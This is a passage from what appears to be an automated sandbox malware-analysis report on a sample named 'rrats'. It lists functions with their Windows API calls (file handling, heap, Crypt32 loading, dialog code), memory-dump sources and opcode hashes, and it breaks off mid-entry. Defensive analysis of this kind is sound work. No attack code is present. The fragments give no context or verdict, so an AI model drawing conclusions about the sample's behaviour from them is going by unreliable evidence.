                                                              Function 00CA9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CA73BC,?,?,?,00000000), ref: 00CA9DBC
                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00CA9E70
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: File$BuffersFlushTime
                                                              • String ID:
                                                              • API String ID: 1392018926-0
                                                              • Opcode ID: 6dca8e7239a7c81993cfe4a33acc5279718348e3f153fb8b37b06952a76f5777
                                                              • Instruction ID: 02bdfcfc4330122cc2bb46f624630084cfa334420d4c10ee8aa659808a3331a9
                                                              • Opcode Fuzzy Hash: 6dca8e7239a7c81993cfe4a33acc5279718348e3f153fb8b37b06952a76f5777
                                                              • Instruction Fuzzy Hash: 4421D2312492469BC714CF34C492AABBBE4EF56308F08491DF4D587151D339EA4C9B62
                                                              Function 00CA966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00CA9F27,?,?,00CA771A), ref: 00CA96E6
                                                              • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00CA9F27,?,?,00CA771A), ref: 00CA9716
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: f2447513e94661ea6b15516d194e6ef03063c4e61daab4a69ac431dda3fd9bdd
                                                              • Instruction ID: fde1b36afc92f7dc3b0b0c2c5d51ba37b2c696322a7d52a0fe8018eaa8bb42d4
                                                              • Opcode Fuzzy Hash: f2447513e94661ea6b15516d194e6ef03063c4e61daab4a69ac431dda3fd9bdd
                                                              • Instruction Fuzzy Hash: E021CFB11007456FE3708A65CC8ABE7B7DCEF4A328F100A19FAA6C61D1C774A9849631
                                                              Function 00CA9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00CA9EC7
                                                              • GetLastError.KERNEL32 ref: 00CA9ED4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastPointer
                                                              • String ID:
                                                              • API String ID: 2976181284-0
                                                              • Opcode ID: 3079eba4a550e81371bad2d1c3e086984c46d0c9071644d94481ae5038256e44
                                                              • Instruction ID: eb3217e0c59380d224cdc218d4cd61a8ccb525f830594c7ce9713221139e3357
                                                              • Opcode Fuzzy Hash: 3079eba4a550e81371bad2d1c3e086984c46d0c9071644d94481ae5038256e44
                                                              • Instruction Fuzzy Hash: B311E570600706ABD724C629CC42BA6B7E8EB46364F544A29E563D26D1D770EE45C760
                                                              Function 00CC8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _free.LIBCMT ref: 00CC8E75
                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC4286,?,0000015D,?,?,?,?,00CC5762,000000FF,00000000,?,?), ref: 00CC8E38
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00CE1098,00CA17CE,?,?,00000007,?,?,?,00CA13D6,?,00000000), ref: 00CC8EB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocAllocate_free
                                                              • String ID:
                                                              • API String ID: 2447670028-0
                                                              • Opcode ID: a8b744473fde5bc5433a219189c93fdfe4da232df3c26d20875711fdda9ffacf
                                                              • Instruction ID: 29a2eed75e1b94908cb53bde9ce9d2ea9c217d5b8a8575170bfb803c8c5ff984
                                                              • Opcode Fuzzy Hash: a8b744473fde5bc5433a219189c93fdfe4da232df3c26d20875711fdda9ffacf
                                                              • Instruction Fuzzy Hash: C5F0213A60110566CB212A2ADC05FAF375CCFC2770F55012DF82497191DF71CE04A1A0
                                                              Function 00CB109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00CB10AB
                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00CB10B2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Process$AffinityCurrentMask
                                                              • String ID:
                                                              • API String ID: 1231390398-0
                                                              • Opcode ID: 253f64a2752f3694e8c7e7debffe9e71f6738264fdf63d993fd0895d07630e4d
                                                              • Instruction ID: 83b3ca13fdfddc602e8bf99415219872a3d5de13031281507f68c0836879ca68
                                                              • Opcode Fuzzy Hash: 253f64a2752f3694e8c7e7debffe9e71f6738264fdf63d993fd0895d07630e4d
                                                              • Instruction Fuzzy Hash: 03E0D832B10185A7CF0997B4AC15AEF73EDEA44204B188176EC13D3101F934EF414760
                                                              Function 00CAE648 Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadStringW.USER32(00CA13B6,?,00CE1098,00CA13B6), ref: 00CAE678
                                                              • LoadStringW.USER32(00CA13B6,?,00CE1098), ref: 00CAE68F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: LoadString
                                                              • String ID:
                                                              • API String ID: 2948472770-0
                                                              • Opcode ID: 2ef9645bf2284300d1a51cd18da3014fbb2a301dda0bf00bd916d93341ba821d
                                                              • Instruction ID: b997df481fc70d0263bf256c87dc4e5fcd263012c0ccbe6036a5f2744567053b
                                                              • Opcode Fuzzy Hash: 2ef9645bf2284300d1a51cd18da3014fbb2a301dda0bf00bd916d93341ba821d
                                                              • Instruction Fuzzy Hash: F5F0F876100299BBCF111FA1EC04EAF7F69EF1A3947048415FE188A220D6328970EBE0
                                                              Function 00CAA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA501
                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CAA325,?,?,?,00CAA175,?,00000001,00000000,?,?), ref: 00CAA532
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 700f7bc483269ef9f32f540b0b5bc078b69e8c904031551d6366052646a86bd6
                                                              • Instruction ID: a1177e5b6625da57317e09edb4fdffd53282b339027e8cff585b328b6f7f4563
                                                              • Opcode Fuzzy Hash: 700f7bc483269ef9f32f540b0b5bc078b69e8c904031551d6366052646a86bd6
                                                              • Instruction Fuzzy Hash: 22F0393224024ABBDF015F60DC45FDE3BACAB05789F888062B949D6160DB71DF98EA65
                                                              Function 00CAA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641,000000FF), ref: 00CAA1F1
                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CA977F,?,?,00CA95CF,?,?,?,?,?,00CD2641), ref: 00CAA21F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: DeleteFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2643169976-0
                                                              • Opcode ID: b2a5138ddf844dfc5315a2162918383e67322da012c5012d1a172bc7e58f5643
                                                              • Instruction ID: e511136b5bcd46315caf47c1acdd58d5ad91512591086a619ce92fbe6bcfdd86
                                                              • Opcode Fuzzy Hash: b2a5138ddf844dfc5315a2162918383e67322da012c5012d1a172bc7e58f5643
                                                              • Instruction Fuzzy Hash: 89E0923514020A6BDB015F60DC45FDE379CAB09785F484021B949D2050EB61DE98EA65
                                                              Function 00CBAC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00CD2641,000000FF), ref: 00CBACB0
                                                              • CoUninitialize.COMBASE(?,?,?,?,00CD2641,000000FF), ref: 00CBACB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: GdiplusShutdownUninitialize
                                                              • String ID:
                                                              • API String ID: 3856339756-0
                                                              • Opcode ID: a1b6a0b5997c2d4f86e5c5a6a13338ab6d83040b2d605e96ef50362f111b2808
                                                              • Instruction ID: a98ae74203f2d5aaeb2b85cbbd162b6231aa8e0db11f5a89e04075cb85cffeeb
                                                              • Opcode Fuzzy Hash: a1b6a0b5997c2d4f86e5c5a6a13338ab6d83040b2d605e96ef50362f111b2808
                                                              • Instruction Fuzzy Hash: 49E06572504650EFC7009B58DC46B49FBACFB88B20F00426AF416D37A0CB74A801CA95
                                                              Function 00CAA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00CAA23A,?,00CA755C,?,?,?,?), ref: 00CAA254
                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00CAA23A,?,00CA755C,?,?,?,?), ref: 00CAA280
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 261d46f67ce0f21cba8bf5ce5cabd0bec294324c092a14e24b285c243a26797e
                                                              • Instruction ID: f86576aa38e3041fee3fa81fe1ae213f610e785259a7b0c37ba6c094237f844f
                                                              • Opcode Fuzzy Hash: 261d46f67ce0f21cba8bf5ce5cabd0bec294324c092a14e24b285c243a26797e
                                                              • Instruction Fuzzy Hash: 76E092315001245BCB50AB64DC09BE97B98AB0D3E5F044261FD59E3190D770DE44CAA1
                                                              Function 00CBDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00CBDEEC
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00CBDF03
                                                                • Part of subcall function 00CBB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CBB579
                                                                • Part of subcall function 00CBB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB58A
                                                                • Part of subcall function 00CBB568: IsDialogMessageW.USER32(0001046A,?), ref: 00CBB59E
                                                                • Part of subcall function 00CBB568: TranslateMessage.USER32(?), ref: 00CBB5AC
                                                                • Part of subcall function 00CBB568: DispatchMessageW.USER32(?), ref: 00CBB5B6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                              • String ID:
                                                              • API String ID: 2718869927-0
                                                              • Opcode ID: 1610d030a23cc808b109370afcf15c2246594188c2cfabb45a92c841476a5f31
                                                              • Instruction ID: 491766edba2a3d1c4d00e06ccb89996b0b0ba846c22dfaae2acf46582c249073
                                                              • Opcode Fuzzy Hash: 1610d030a23cc808b109370afcf15c2246594188c2cfabb45a92c841476a5f31
                                                              • Instruction Fuzzy Hash: BAE0D8B240038D2ADF02AB60DC07FDE3BAC9B05789F040851B205EB0F3DA78EA14A771
                                                              Function 00CB081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1175261203-0
                                                              • Opcode ID: d884e75d5a783cccfc8f7189b8d786a28d50963914016e3b8b07e73dba185825
                                                              • Instruction ID: 7de1448d144bc4672e2e2cd13836fd5492be9851b478ab42395583664c9046ab
                                                              • Opcode Fuzzy Hash: d884e75d5a783cccfc8f7189b8d786a28d50963914016e3b8b07e73dba185825
                                                              • Instruction Fuzzy Hash: D0E04F768011686BDB11ABA4DC49FDB7BACFF097D1F040066B649E2044DA74EF84CBB0
                                                              Function 00CBA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CBA3DA
                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00CBA3E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: BitmapCreateFromGdipStream
                                                              • String ID:
                                                              • API String ID: 1918208029-0
                                                              • Opcode ID: 5547c8ef3c87d8783d9156778135fec0879bd5ae3c9f9917d889cc4dc0b1ef46
                                                              • Instruction ID: f84a387e1cfec4a92455aa0481fdf45e12910402f0e5a2bd0425e8469ff496ad
                                                              • Opcode Fuzzy Hash: 5547c8ef3c87d8783d9156778135fec0879bd5ae3c9f9917d889cc4dc0b1ef46
                                                              • Instruction Fuzzy Hash: 15E0ED71500218EBCB10DF55C5416D9BBE8EF04760F10805AA99693211E374AE44DBA1
                                                              Function 00CC2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC2BAA
                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00CC2BB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                              • String ID:
                                                              • API String ID: 1660781231-0
                                                              • Opcode ID: 378f96bd0d964ee3a7223b8ccf5ba6cd78930245e9a872515626fc50e8f69641
                                                              • Instruction ID: c7455d5be9e04bfba86586052cbafc87900aa3627f069572d09c9cbc4fccbe21
                                                              • Opcode Fuzzy Hash: 378f96bd0d964ee3a7223b8ccf5ba6cd78930245e9a872515626fc50e8f69641
                                                              • Instruction Fuzzy Hash: 0FD022341643009A8C147E75F82BF5D3385AD41B70BA083DEF033894C1EE1099C0B021
                                                              Function 00CA12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ItemShowWindow
                                                              • String ID:
                                                              • API String ID: 3351165006-0
                                                              • Opcode ID: 36875bbd1d41359cb48bd6d6f47aa791c3bc1843f111ef685cf25e78da402bd5
                                                              • Instruction ID: c239820125071563d5b0fb2beadc8dd3405bb22c2b4d20d196b34534715283a4
                                                              • Opcode Fuzzy Hash: 36875bbd1d41359cb48bd6d6f47aa791c3bc1843f111ef685cf25e78da402bd5
                                                              • Instruction Fuzzy Hash: 19C0123205C300BECB010BB4DC09E2BBBACABA9312F04C90CB0A9C0260C238C120DB62
                                                              Function 00CA12D3 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00CA12E1
                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00CA12E8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
